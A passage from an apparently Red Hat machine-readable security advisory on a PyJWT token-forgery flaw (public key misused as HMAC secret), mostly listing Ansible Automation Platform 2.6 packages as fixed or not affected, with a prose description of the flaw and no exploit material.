"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in PyJWT allows for authentication bypass and unauthorized access. It occurs when a JWT verifier is misconfigured to accept both symmetric and asymmetric algorithms, and a public JSON Web Key is erroneously used as the HMAC secret. Red Hat products are only affected if they utilize this specific, non-standard verifier configuration.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
